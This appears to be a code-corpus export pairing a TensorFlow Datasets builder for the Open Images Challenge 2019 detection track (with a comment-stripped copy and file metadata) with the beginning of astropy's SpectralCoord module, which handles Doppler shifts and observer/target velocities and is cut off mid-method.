_URL = "https://storage.googleapis.com/openimages/web/challenge2019.html"
_GOOGLE_URL_PREFIX = (
"https://storage.googleapis.com/openimages/challenge_2019/challenge-2019-")
_FIGURE_EIGHT_BASE_URL = (
"https://datasets.figure-eight.com/figure_eight_datasets/open-images/")
_TRAIN_IMAGES_URLS = [
"{}zip_files_copy/train_{:02d}.zip".format(_FIGURE_EIGHT_BASE_URL, n)
for n in range(9)
]
_VALIDATION_IMAGES_URL = (
_FIGURE_EIGHT_BASE_URL + "zip_files_copy/validation.zip")
_TEST_IMAGES_URL = _FIGURE_EIGHT_BASE_URL + "test_challenge.zip"
_NUM_CLASSES = 500
class OpenImagesChallenge2019Config(tfds.core.BuilderConfig):
"""BuilderConfig for OpenImages Challenge 2019 datasets."""
def __init__(self, target_pixels=None, **kwargs):
kwargs.setdefault("version", tfds.core.Version("1.0.0"))
super(OpenImagesChallenge2019Config, self).__init__(**kwargs)
self._target_pixels = target_pixels
@property
def target_pixels(self):
return self._target_pixels
class _OpenImagesChallenge2019(tfds.core.BeamBasedBuilder):
"""Base abstract class for Open Images Challenge 2019 datasets."""
BUILDER_CONFIGS = [
OpenImagesChallenge2019Config(
name="200k",
description="Images have at most 200,000 pixels, at 72 JPEG quality.",
target_pixels=200000),
OpenImagesChallenge2019Config(
name="300k",
description="Images have at most 300,000 pixels, at 72 JPEG quality.",
target_pixels=300000),
]
@property
@abc.abstractmethod
def annotation_urls(self):
"""Dictionary passed to the DownloadManager to download annotations.
An example:
{"test_annotations": "https://somewebpage.com/data/openimages/test.txt"}
Returns:
A dictionary whose values are the URLs to download the annotations of the
dataset, and the keys are some short string identifying the URL.
This dictionary is passed to the DownloadManager.
"""
def _split_generators(self, dl_manager):
urls = {
"train_images": _TRAIN_IMAGES_URLS,
"test_images": [_TEST_IMAGES_URL],
"validation_images": [_VALIDATION_IMAGES_URL]
}
urls.update(self.annotation_urls)
paths = dl_manager.download(urls)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs=dict(paths=paths, split="train"),
),
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs=dict(paths=paths, split="test"),
),
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs=dict(paths=paths, split="validation"),
),
]
class OpenImagesChallenge2019Detection(_OpenImagesChallenge2019):
"""Dataset for the Detection Track."""
@property
def annotation_urls(self):
return {
"train_image_label":
_GOOGLE_URL_PREFIX + "train-detection-human-imagelabels.csv",
"train_boxes":
_GOOGLE_URL_PREFIX + "train-detection-bbox.csv",
"validation_image_label":
_GOOGLE_URL_PREFIX + "validation-detection-human-imagelabels.csv",
"validation_boxes":
_GOOGLE_URL_PREFIX + "validation-detection-bbox.csv",
"classes":
_GOOGLE_URL_PREFIX + "classes-description-500.csv",
"hierarchy":
_GOOGLE_URL_PREFIX + "label500-hierarchy.json",
}
def _info(self):
label = tfds.features.ClassLabel(num_classes=_NUM_CLASSES)
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION + "\n\n" + _DESCRIPTION_DETECTION,
features=tfds.features.FeaturesDict({
"id":
tfds.features.Text(),
"image":
tfds.features.Image(),
# A sequence of image-level labels.
"objects":
tfds.features.Sequence({
"label": label,
# All labels have been verified by humans.
# - If confidence is 1.0, the object IS in the image.
# - If confidence is 0.0, the object is NOT in the image.
"confidence": tf.float32,
"source": tfds.features.Text(),
}),
# A sequence of bounding boxes.
"bobjects":
tfds.features.Sequence({
"label": label,
"bbox": tfds.features.BBoxFeature(),
"is_group_of": tf.bool,
}),
}),
homepage=_URL,
)
def _build_pcollection(self, pipeline, paths, split):
beam = tfds.core.lazy_imports.apache_beam
# We need to lazily import the oi_beam module (and thus, violate the
# "imports only at the top" rule), so that beam is only required during the
# generation of the dataset, and not to use the dataset itself (once built).
# See: https://www.tensorflow.org/datasets/beam_datasets.
import tensorflow_datasets.object_detection.open_images_challenge2019_beam as oi_beam # pylint: disable=g-import-not-at-top,import-outside-toplevel
if split == "test":
# Note: annotations are not available for the test split.
generate_examples_kwargs = dict(
image_labels_filepath=None,
box_labels_filepath=None,
hierarchy_filepath=None,
classes_filepath=None,
)
else:
generate_examples_kwargs = dict(
image_labels_filepath=paths["{}_image_label".format(split)],
box_labels_filepath=paths["{}_boxes".format(split)],
hierarchy_filepath=paths["hierarchy"],
classes_filepath=paths["classes"],
)
# Fill class names after the data has been downloaded.
oi_beam.fill_class_names_in_tfds_info(paths["classes"], self.info.features)
return (pipeline | beam.Create(paths["{}_images".format(split)])
| "ReadImages" >> beam.ParDo(oi_beam.ReadZipFn())
| "ProcessImages" >> beam.ParDo(
oi_beam.ProcessImageFn(
target_pixels=self.builder_config.target_pixels,
jpeg_quality=72))
| "GenerateExamples" >> beam.ParDo(
oi_beam.CreateDetectionExampleFn(**generate_examples_kwargs)))
| 38.533654 | 152 | 0.675234 |
import abc
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_DESCRIPTION = """\
Open Images is a collaborative release of ~9 million images annotated with
image-level labels, object bounding boxes, object segmentation masks, and
visual relationships. This uniquely large and diverse dataset is designed to
spur state of the art advances in analyzing and understanding images.
"""
_DESCRIPTION_DETECTION = """\
This contains the data from thee Object Detection track of the competition.
The goal in this track is to predict a tight bounding box around all object
instances of 500 classes.
The images are annotated with positive image-level labels, indicating certain
object classes are present, and with negative image-level labels, indicating
certain classes are absent. In the competition, all other unannotated classes
are excluded from evaluation in that image. For each positive image-level label
in an image, every instance of that object class in the image was annotated.
"""
_URL = "https://storage.googleapis.com/openimages/web/challenge2019.html"
_GOOGLE_URL_PREFIX = (
"https://storage.googleapis.com/openimages/challenge_2019/challenge-2019-")
_FIGURE_EIGHT_BASE_URL = (
"https://datasets.figure-eight.com/figure_eight_datasets/open-images/")
_TRAIN_IMAGES_URLS = [
"{}zip_files_copy/train_{:02d}.zip".format(_FIGURE_EIGHT_BASE_URL, n)
for n in range(9)
]
_VALIDATION_IMAGES_URL = (
_FIGURE_EIGHT_BASE_URL + "zip_files_copy/validation.zip")
_TEST_IMAGES_URL = _FIGURE_EIGHT_BASE_URL + "test_challenge.zip"
_NUM_CLASSES = 500
class OpenImagesChallenge2019Config(tfds.core.BuilderConfig):
def __init__(self, target_pixels=None, **kwargs):
kwargs.setdefault("version", tfds.core.Version("1.0.0"))
super(OpenImagesChallenge2019Config, self).__init__(**kwargs)
self._target_pixels = target_pixels
@property
def target_pixels(self):
return self._target_pixels
class _OpenImagesChallenge2019(tfds.core.BeamBasedBuilder):
BUILDER_CONFIGS = [
OpenImagesChallenge2019Config(
name="200k",
description="Images have at most 200,000 pixels, at 72 JPEG quality.",
target_pixels=200000),
OpenImagesChallenge2019Config(
name="300k",
description="Images have at most 300,000 pixels, at 72 JPEG quality.",
target_pixels=300000),
]
@property
@abc.abstractmethod
def annotation_urls(self):
def _split_generators(self, dl_manager):
urls = {
"train_images": _TRAIN_IMAGES_URLS,
"test_images": [_TEST_IMAGES_URL],
"validation_images": [_VALIDATION_IMAGES_URL]
}
urls.update(self.annotation_urls)
paths = dl_manager.download(urls)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs=dict(paths=paths, split="train"),
),
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs=dict(paths=paths, split="test"),
),
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs=dict(paths=paths, split="validation"),
),
]
class OpenImagesChallenge2019Detection(_OpenImagesChallenge2019):
@property
def annotation_urls(self):
return {
"train_image_label":
_GOOGLE_URL_PREFIX + "train-detection-human-imagelabels.csv",
"train_boxes":
_GOOGLE_URL_PREFIX + "train-detection-bbox.csv",
"validation_image_label":
_GOOGLE_URL_PREFIX + "validation-detection-human-imagelabels.csv",
"validation_boxes":
_GOOGLE_URL_PREFIX + "validation-detection-bbox.csv",
"classes":
_GOOGLE_URL_PREFIX + "classes-description-500.csv",
"hierarchy":
_GOOGLE_URL_PREFIX + "label500-hierarchy.json",
}
def _info(self):
label = tfds.features.ClassLabel(num_classes=_NUM_CLASSES)
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION + "\n\n" + _DESCRIPTION_DETECTION,
features=tfds.features.FeaturesDict({
"id":
tfds.features.Text(),
"image":
tfds.features.Image(),
"objects":
tfds.features.Sequence({
"label": label,
"confidence": tf.float32,
"source": tfds.features.Text(),
}),
"bobjects":
tfds.features.Sequence({
"label": label,
"bbox": tfds.features.BBoxFeature(),
"is_group_of": tf.bool,
}),
}),
homepage=_URL,
)
def _build_pcollection(self, pipeline, paths, split):
beam = tfds.core.lazy_imports.apache_beam
import tensorflow_datasets.object_detection.open_images_challenge2019_beam as oi_beam
if split == "test":
generate_examples_kwargs = dict(
image_labels_filepath=None,
box_labels_filepath=None,
hierarchy_filepath=None,
classes_filepath=None,
)
else:
generate_examples_kwargs = dict(
image_labels_filepath=paths["{}_image_label".format(split)],
box_labels_filepath=paths["{}_boxes".format(split)],
hierarchy_filepath=paths["hierarchy"],
classes_filepath=paths["classes"],
)
oi_beam.fill_class_names_in_tfds_info(paths["classes"], self.info.features)
return (pipeline | beam.Create(paths["{}_images".format(split)])
| "ReadImages" >> beam.ParDo(oi_beam.ReadZipFn())
| "ProcessImages" >> beam.ParDo(
oi_beam.ProcessImageFn(
target_pixels=self.builder_config.target_pixels,
jpeg_quality=72))
| "GenerateExamples" >> beam.ParDo(
oi_beam.CreateDetectionExampleFn(**generate_examples_kwargs)))
| true | true |
7900fd070912f7dd0c815ddd24ef926641ec5983 | 31,863 | py | Python | astropy/coordinates/spectral_coordinate.py | ysBach/astropy | 10d27d8292bafb3ab502f4147dd707473e69af71 | [
"BSD-3-Clause"
] | 4 | 2021-03-25T15:49:56.000Z | 2021-12-15T09:10:04.000Z | astropy/coordinates/spectral_coordinate.py | ysBach/astropy | 10d27d8292bafb3ab502f4147dd707473e69af71 | [
"BSD-3-Clause"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | Lib/site-packages/astropy/coordinates/spectral_coordinate.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | 3 | 2021-03-28T16:13:00.000Z | 2021-07-16T10:27:25.000Z | import warnings
from textwrap import indent
import astropy.units as u
import numpy as np
from astropy.constants import c
from astropy.coordinates import (ICRS,
CartesianDifferential,
CartesianRepresentation, SkyCoord)
from astropy.coordinates.spectral_quantity import SpectralQuantity
from astropy.coordinates.baseframe import (BaseCoordinateFrame,
frame_transform_graph)
from astropy.utils.exceptions import AstropyUserWarning
__all__ = ['SpectralCoord']
class NoVelocityWarning(AstropyUserWarning):
pass
class NoDistanceWarning(AstropyUserWarning):
pass
KMS = u.km / u.s
C_KMS = c.to(KMS)
ZERO_VELOCITIES = CartesianDifferential([0, 0, 0] * KMS)
# Default distance to use for target when none is provided
DEFAULT_DISTANCE = 1e6 * u.kpc
# We don't want to run doctests in the docstrings we inherit from Quantity
__doctest_skip__ = ['SpectralCoord.*']
def _velocity_to_redshift(velocity):
"""
Convert a velocity to a relativistic redshift.
"""
beta = velocity / C_KMS
return np.sqrt((1 + beta) / (1 - beta)) - 1
def _redshift_to_velocity(redshift):
"""
Convert a relativistic redshift to a velocity.
"""
zponesq = (1 + redshift) ** 2
return (C_KMS * (zponesq - 1) / (zponesq + 1))
def _apply_relativistic_doppler_shift(scoord, velocity):
"""
Given a `SpectralQuantity` and a velocity, return a new `SpectralQuantity`
that is Doppler shifted by this amount.
Note that the Doppler shift applied is the full relativistic one, so
`SpectralQuantity` currently expressed in velocity and not using the
relativistic convention will temporarily be converted to use the
relativistic convention while the shift is applied.
Positive velocities are assumed to redshift the spectral quantity,
while negative velocities blueshift the spectral quantity.
"""
# NOTE: we deliberately don't keep sub-classes of SpectralQuantity intact
# since we can't guarantee that their metadata would be correct/consistent.
squantity = scoord.view(SpectralQuantity)
beta = velocity / c
doppler_factor = np.sqrt((1 + beta) / (1 - beta))
if squantity.unit.is_equivalent(u.m): # wavelength
return squantity * doppler_factor
elif (squantity.unit.is_equivalent(u.Hz) or
squantity.unit.is_equivalent(u.eV) or
squantity.unit.is_equivalent(1 / u.m)):
return squantity / doppler_factor
elif squantity.unit.is_equivalent(KMS): # velocity
return (squantity.to(u.Hz) / doppler_factor).to(squantity.unit)
else: # pragma: no cover
raise RuntimeError(f"Unexpected units in velocity shift: {squantity.unit}. "
"This should not happen, so please report this in the "
"astropy issue tracker!")
def update_differentials_to_match(original, velocity_reference, preserve_observer_frame=False):
"""
Given an original coordinate object, update the differentials so that
the final coordinate is at the same location as the original coordinate
but co-moving with the velocity reference object.
If preserve_original_frame is set to True, the resulting object will be in
the frame of the original coordinate, otherwise it will be in the frame of
the velocity reference.
"""
if not velocity_reference.data.differentials:
raise ValueError("Reference frame has no velocities")
# If the reference has an obstime already defined, we should ignore
# it and stick with the original observer obstime.
if 'obstime' in velocity_reference.frame_attributes and hasattr(original, 'obstime'):
velocity_reference = velocity_reference.replicate(obstime=original.obstime)
# We transform both coordinates to ICRS for simplicity and because we know
# it's a simple frame that is not time-dependent (it could be that both
# the original and velocity_reference frame are time-dependent)
original_icrs = original.transform_to(ICRS())
velocity_reference_icrs = velocity_reference.transform_to(ICRS())
differentials = velocity_reference_icrs.data.represent_as(CartesianRepresentation,
CartesianDifferential).differentials
data_with_differentials = (original_icrs.data.represent_as(CartesianRepresentation)
.with_differentials(differentials))
final_icrs = original_icrs.realize_frame(data_with_differentials)
if preserve_observer_frame:
final = final_icrs.transform_to(original)
else:
final = final_icrs.transform_to(velocity_reference)
return final.replicate(representation_type=CartesianRepresentation,
differential_type=CartesianDifferential)
def attach_zero_velocities(coord):
"""
Set the differentials to be stationary on a coordinate object.
"""
new_data = coord.cartesian.with_differentials(ZERO_VELOCITIES)
return coord.realize_frame(new_data)
def _get_velocities(coord):
if 's' in coord.data.differentials:
return coord.velocity
else:
return ZERO_VELOCITIES
class SpectralCoord(SpectralQuantity):
"""
A spectral coordinate with its corresponding unit.
.. note:: The |SpectralCoord| class is new in Astropy v4.1 and should be
considered experimental at this time. Note that we do not fully
support cases where the observer and target are moving
relativistically relative to each other, so care should be taken
in those cases. It is possible that there will be API changes in
future versions of Astropy based on user feedback. If you have
specific ideas for how it might be improved, please let us know
on the `astropy-dev mailing list`_ or at
http://feedback.astropy.org.
Parameters
----------
value : ndarray or `~astropy.units.Quantity` or `SpectralCoord`
Spectral values, which should be either wavelength, frequency,
energy, wavenumber, or velocity values.
unit : str or `~astropy.units.Unit`
Unit for the given spectral values.
observer : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of observer. If no velocities
are present on this object, the observer is assumed to be stationary
relative to the frame origin.
target : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of target. If no velocities
are present on this object, the target is assumed to be stationary
relative to the frame origin.
radial_velocity : `~astropy.units.Quantity`, optional
The radial velocity of the target with respect to the observer. This
can only be specified if ``redshift`` is not specified.
redshift : float, optional
The relativistic redshift of the target with respect to the observer.
This can only be specified if ``radial_velocity`` cannot be specified.
doppler_rest : `~astropy.units.Quantity`, optional
The rest value to use when expressing the spectral value as a velocity.
doppler_convention : str, optional
The Doppler convention to use when expressing the spectral value as a velocity.
"""
@u.quantity_input(radial_velocity=u.km/u.s)
def __new__(cls, value, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
**kwargs):
obj = super().__new__(cls, value, unit=unit, **kwargs)
# There are two main modes of operation in this class. Either the
# observer and target are both defined, in which case the radial
# velocity and redshift are automatically computed from these, or
# only one of the observer and target are specified, along with a
# manually specified radial velocity or redshift. So if a target and
# observer are both specified, we can't also accept a radial velocity
# or redshift.
if target is not None and observer is not None:
if radial_velocity is not None or redshift is not None:
raise ValueError("Cannot specify radial velocity or redshift if both "
"target and observer are specified")
# We only deal with redshifts here and in the redshift property.
# Otherwise internally we always deal with velocities.
if redshift is not None:
if radial_velocity is not None:
raise ValueError("Cannot set both a radial velocity and redshift")
redshift = u.Quantity(redshift)
# For now, we can't specify redshift=u.one in quantity_input above
# and have it work with plain floats, but if that is fixed, for
# example as in https://github.com/astropy/astropy/pull/10232, we
# can remove the check here and add redshift=u.one to the decorator
if not redshift.unit.is_equivalent(u.one):
raise u.UnitsError('redshift should be dimensionless')
radial_velocity = _redshift_to_velocity(redshift)
# If we're initializing from an existing SpectralCoord, keep any
# parameters that aren't being overridden
if observer is None:
observer = getattr(value, 'observer', None)
if target is None:
target = getattr(value, 'target', None)
# As mentioned above, we should only specify the radial velocity
# manually if either or both the observer and target are not
# specified.
if observer is None or target is None:
if radial_velocity is None:
radial_velocity = getattr(value, 'radial_velocity', None)
obj._radial_velocity = radial_velocity
obj._observer = cls._validate_coordinate(observer, label='observer')
obj._target = cls._validate_coordinate(target, label='target')
return obj
def __array_finalize__(self, obj):
super().__array_finalize__(obj)
self._radial_velocity = getattr(obj, '_radial_velocity', None)
self._observer = getattr(obj, '_observer', None)
self._target = getattr(obj, '_target', None)
@staticmethod
def _validate_coordinate(coord, label=''):
"""
Checks the type of the frame and whether a velocity differential and a
distance has been defined on the frame object.
If no distance is defined, the target is assumed to be "really far
away", and the observer is assumed to be "in the solar system".
Parameters
----------
coord : `~astropy.coordinates.BaseCoordinateFrame`
The new frame to be used for target or observer.
label : str, optional
The name of the object being validated (e.g. 'target' or 'observer'),
which is then used in error messages.
"""
if coord is None:
return
if not issubclass(coord.__class__, BaseCoordinateFrame):
if isinstance(coord, SkyCoord):
coord = coord.frame
else:
raise TypeError(f"{label} must be a SkyCoord or coordinate frame instance")
# If the distance is not well-defined, ensure that it works properly
# for generating differentials
# TODO: change this to not set the distance and yield a warning once
# there's a good way to address this in astropy.coordinates
# https://github.com/astropy/astropy/issues/10247
with np.errstate(all='ignore'):
distance = getattr(coord, 'distance', None)
if distance is not None and distance.unit.physical_type == 'dimensionless':
coord = SkyCoord(coord, distance=DEFAULT_DISTANCE)
warnings.warn(
"Distance on coordinate object is dimensionless, an "
f"abritrary distance value of {DEFAULT_DISTANCE} will be set instead.",
NoDistanceWarning)
# If the observer frame does not contain information about the
# velocity of the system, assume that the velocity is zero in the
# system.
if 's' not in coord.data.differentials:
warnings.warn(
"No velocity defined on frame, assuming {}.".format(
ZERO_VELOCITIES),
NoVelocityWarning)
coord = attach_zero_velocities(coord)
return coord
def replicate(self, value=None, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
doppler_convention=None, doppler_rest=None,
copy=False):
"""
Return a replica of the `SpectralCoord`, optionally changing the
values or attributes.
Note that no conversion is carried out by this method - this keeps
all the values and attributes the same, except for the ones explicitly
passed to this method which are changed.
If ``copy`` is set to `True` then a full copy of the internal arrays
will be made. By default the replica will use a reference to the
original arrays when possible to save memory.
Parameters
----------
value : ndarray or `~astropy.units.Quantity` or `SpectralCoord`, optional
Spectral values, which should be either wavelength, frequency,
energy, wavenumber, or velocity values.
unit : str or `~astropy.units.Unit`
Unit for the given spectral values.
observer : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of observer.
target : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of target.
radial_velocity : `~astropy.units.Quantity`, optional
The radial velocity of the target with respect to the observer.
redshift : float, optional
The relativistic redshift of the target with respect to the observer.
doppler_rest : `~astropy.units.Quantity`, optional
The rest value to use when expressing the spectral value as a velocity.
doppler_convention : str, optional
The Doppler convention to use when expressing the spectral value as a velocity.
copy : bool, optional
If `True`, and ``value`` is not specified, the values are copied to
the new `SkyCoord` - otherwise a reference to the same values is used.
Returns
-------
sc : `SpectralCoord` object
Replica of this object
"""
if isinstance(value, u.Quantity):
if unit is not None:
raise ValueError("Cannot specify value as a Quantity and also specify unit")
else:
value, unit = value.value, value.unit
value = value if value is not None else self.value
unit = unit or self.unit
observer = self._validate_coordinate(observer) or self.observer
target = self._validate_coordinate(target) or self.target
doppler_convention = doppler_convention or self.doppler_convention
doppler_rest = doppler_rest or self.doppler_rest
# If value is being taken from self and copy is Tru
if copy:
value = value.copy()
# Only include radial_velocity if it is not auto-computed from the
# observer and target.
if (self.observer is None or self.target is None) and radial_velocity is None and redshift is None:
radial_velocity = self.radial_velocity
with warnings.catch_warnings():
warnings.simplefilter('ignore', NoVelocityWarning)
return self.__class__(value=value, unit=unit,
observer=observer, target=target,
radial_velocity=radial_velocity, redshift=redshift,
doppler_convention=doppler_convention, doppler_rest=doppler_rest, copy=False)
@property
def quantity(self):
"""
Convert the ``SpectralCoord`` to a `~astropy.units.Quantity`.
Equivalent to ``self.view(u.Quantity)``.
Returns
-------
`~astropy.units.Quantity`
This object viewed as a `~astropy.units.Quantity`.
"""
return self.view(u.Quantity)
@property
def observer(self):
"""
The coordinates of the observer.
If set, and a target is set as well, this will override any explicit
radial velocity passed in.
Returns
-------
`~astropy.coordinates.BaseCoordinateFrame`
The astropy coordinate frame representing the observation.
"""
return self._observer
@observer.setter
def observer(self, value):
if self.observer is not None:
raise ValueError("observer has already been set")
self._observer = self._validate_coordinate(value, label='observer')
# Switch to auto-computing radial velocity
if self._target is not None:
self._radial_velocity = None
@property
def target(self):
"""
The coordinates of the target being observed.
If set, and an observer is set as well, this will override any explicit
radial velocity passed in.
Returns
-------
`~astropy.coordinates.BaseCoordinateFrame`
The astropy coordinate frame representing the target.
"""
return self._target
@target.setter
def target(self, value):
if self.target is not None:
raise ValueError("target has already been set")
self._target = self._validate_coordinate(value, label='target')
# Switch to auto-computing radial velocity
if self._observer is not None:
self._radial_velocity = None
@property
def radial_velocity(self):
"""
Radial velocity of target relative to the observer.
Returns
-------
`~astropy.units.Quantity`
Radial velocity of target.
Notes
-----
This is different from the ``.radial_velocity`` property of a
coordinate frame in that this calculates the radial velocity with
respect to the *observer*, not the origin of the frame.
"""
if self._observer is None or self._target is None:
if self._radial_velocity is None:
return 0 * KMS
else:
return self._radial_velocity
else:
return self._calculate_radial_velocity(self._observer, self._target,
as_scalar=True)
@property
def redshift(self):
"""
Redshift of target relative to observer. Calculated from the radial
velocity.
Returns
-------
float
Redshift of target.
"""
return _velocity_to_redshift(self.radial_velocity)
@staticmethod
def _calculate_radial_velocity(observer, target, as_scalar=False):
"""
Compute the line-of-sight velocity from the observer to the target.
Parameters
----------
observer : `~astropy.coordinates.BaseCoordinateFrame`
The frame of the observer.
target : `~astropy.coordinates.BaseCoordinateFrame`
The frame of the target.
as_scalar : bool
If `True`, the magnitude of the velocity vector will be returned,
otherwise the full vector will be returned.
Returns
-------
`~astropy.units.Quantity`
The radial velocity of the target with respect to the observer.
"""
# Convert observer and target to ICRS to avoid finite differencing
# calculations that lack numerical precision.
observer_icrs = observer.transform_to(ICRS())
target_icrs = target.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
d_vel = target_icrs.velocity - observer_icrs.velocity
vel_mag = pos_hat.dot(d_vel)
if as_scalar:
return vel_mag
else:
return vel_mag * pos_hat
@staticmethod
def _normalized_position_vector(observer, target):
"""
Calculate the normalized position vector between two frames.
Parameters
----------
observer : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`
The observation frame or coordinate.
target : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`
The target frame or coordinate.
Returns
-------
pos_hat : `BaseRepresentation`
Position representation.
"""
d_pos = (target.cartesian.without_differentials() -
observer.cartesian.without_differentials())
dp_norm = d_pos.norm()
# Reset any that are 0 to 1 to avoid nans from 0/0
dp_norm[dp_norm == 0] = 1 * dp_norm.unit
pos_hat = d_pos / dp_norm
return pos_hat
@u.quantity_input(velocity=u.km/u.s)
def with_observer_stationary_relative_to(self, frame, velocity=None, preserve_observer_frame=False):
"""
A new `SpectralCoord` with the velocity of the observer altered,
but not the position.
If a coordinate frame is specified, the observer velocities will be
modified to be stationary in the specified frame. If a coordinate
instance is specified, optionally with non-zero velocities, the
observer velocities will be updated so that the observer is co-moving
with the specified coordinates.
Parameters
----------
frame : str, `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`
The observation frame in which the observer will be stationary. This
can be the name of a frame (e.g. 'icrs'), a frame class, frame instance
with no data, or instance with data. This can optionally include
velocities.
velocity : `~astropy.units.Quantity` or `~astropy.coordinates.CartesianDifferential`, optional
If ``frame`` does not contain velocities, these can be specified as
a 3-element `~astropy.units.Quantity`. In the case where this is
also not specified, the velocities default to zero.
preserve_observer_frame : bool
If `True`, the final observer frame class will be the same as the
original one, and if `False` it will be the frame of the velocity
reference class.
Returns
-------
new_coord : `SpectralCoord`
The new coordinate object representing the spectral data
transformed based on the observer's new velocity frame.
"""
if self.observer is None or self.target is None:
raise ValueError("This method can only be used if both observer "
"and target are defined on the SpectralCoord.")
# Start off by extracting frame if a SkyCoord was passed in
if isinstance(frame, SkyCoord):
frame = frame.frame
if isinstance(frame, BaseCoordinateFrame):
if not frame.has_data:
frame = frame.realize_frame(CartesianRepresentation(0 * u.km, 0 * u.km, 0 * u.km))
if frame.data.differentials:
if velocity is not None:
raise ValueError('frame already has differentials, cannot also specify velocity')
# otherwise frame is ready to go
else:
if velocity is None:
differentials = ZERO_VELOCITIES
else:
differentials = CartesianDifferential(velocity)
frame = frame.realize_frame(frame.data.with_differentials(differentials))
if isinstance(frame, (type, str)):
if isinstance(frame, type):
frame_cls = frame
elif isinstance(frame, str):
frame_cls = frame_transform_graph.lookup_name(frame)
if velocity is None:
velocity = 0 * u.m / u.s, 0 * u.m / u.s, 0 * u.m / u.s
elif velocity.shape != (3,):
raise ValueError('velocity should be a Quantity vector with 3 elements')
frame = frame_cls(0 * u.m, 0 * u.m, 0 * u.m,
*velocity,
representation_type='cartesian',
differential_type='cartesian')
observer = update_differentials_to_match(self.observer, frame,
preserve_observer_frame=preserve_observer_frame)
# Calculate the initial and final los velocity
init_obs_vel = self._calculate_radial_velocity(self.observer, self.target, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(observer, self.target, as_scalar=True)
# Apply transformation to data
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
new_coord = self.replicate(value=new_data, observer=observer)
return new_coord
def with_radial_velocity_shift(self, target_shift=None, observer_shift=None):
"""
Apply a velocity shift to this spectral coordinate.
The shift can be provided as a redshift (float value) or radial
velocity (`~astropy.units.Quantity` with physical type of 'speed').
Parameters
----------
target_shift : float or `~astropy.units.Quantity`
Shift value to apply to current target.
observer_shift : float or `~astropy.units.Quantity`
Shift value to apply to current observer.
Returns
-------
`SpectralCoord`
New spectral coordinate with the target/observer velocity changed
to incorporate the shift. This is always a new object even if
``target_shift`` and ``observer_shift`` are both `None`.
"""
if observer_shift is not None and (self.target is None or
self.observer is None):
raise ValueError("Both an observer and target must be defined "
"before applying a velocity shift.")
for arg in [x for x in [target_shift, observer_shift] if x is not None]:
if isinstance(arg, u.Quantity) and not arg.unit.is_equivalent((u.one, KMS)):
raise u.UnitsError("Argument must have unit physical type "
"'speed' for radial velocty or "
"'dimensionless' for redshift.")
# The target or observer value is defined but is not a quantity object,
# assume it's a redshift float value and convert to velocity
if target_shift is None:
if self._observer is None or self._target is None:
return self.replicate()
target_shift = 0 * KMS
else:
target_shift = u.Quantity(target_shift)
if target_shift.unit.physical_type == 'dimensionless':
target_shift = _redshift_to_velocity(target_shift)
if self._observer is None or self._target is None:
return self.replicate(value=_apply_relativistic_doppler_shift(self, target_shift),
radial_velocity=self.radial_velocity + target_shift)
if observer_shift is None:
observer_shift = 0 * KMS
else:
observer_shift = u.Quantity(observer_shift)
if observer_shift.unit.physical_type == 'dimensionless':
observer_shift = _redshift_to_velocity(observer_shift)
target_icrs = self._target.transform_to(ICRS())
observer_icrs = self._observer.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
target_velocity = _get_velocities(target_icrs) + target_shift * pos_hat
observer_velocity = _get_velocities(observer_icrs) + observer_shift * pos_hat
target_velocity = CartesianDifferential(target_velocity.xyz)
observer_velocity = CartesianDifferential(observer_velocity.xyz)
new_target = (target_icrs
.realize_frame(target_icrs.cartesian.with_differentials(target_velocity))
.transform_to(self._target))
new_observer = (observer_icrs
.realize_frame(observer_icrs.cartesian.with_differentials(observer_velocity))
.transform_to(self._observer))
init_obs_vel = self._calculate_radial_velocity(observer_icrs, target_icrs, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(new_observer, new_target, as_scalar=True)
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
return self.replicate(value=new_data,
observer=new_observer,
target=new_target)
def to_rest(self):
"""
Transforms the spectral axis to the rest frame.
"""
if self.observer is not None and self.target is not None:
return self.with_observer_stationary_relative_to(self.target)
result = _apply_relativistic_doppler_shift(self, -self.radial_velocity)
return self.replicate(value=result, radial_velocity=0. * KMS, redshift=None)
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
try:
radial_velocity = self.radial_velocity
redshift = self.redshift
except ValueError:
radial_velocity = redshift = 'Undefined'
repr_items = [f'{prefixstr}']
if self.observer is not None:
observer_repr = indent(repr(self.observer), 14 * ' ').lstrip()
repr_items.append(f' observer: {observer_repr}')
if self.target is not None:
target_repr = indent(repr(self.target), 12 * ' ').lstrip()
repr_items.append(f' target: {target_repr}')
if (self._observer is not None and self._target is not None) or self._radial_velocity is not None:
if self.observer is not None and self.target is not None:
repr_items.append(' observer to target (computed from above):')
else:
repr_items.append(' observer to target:')
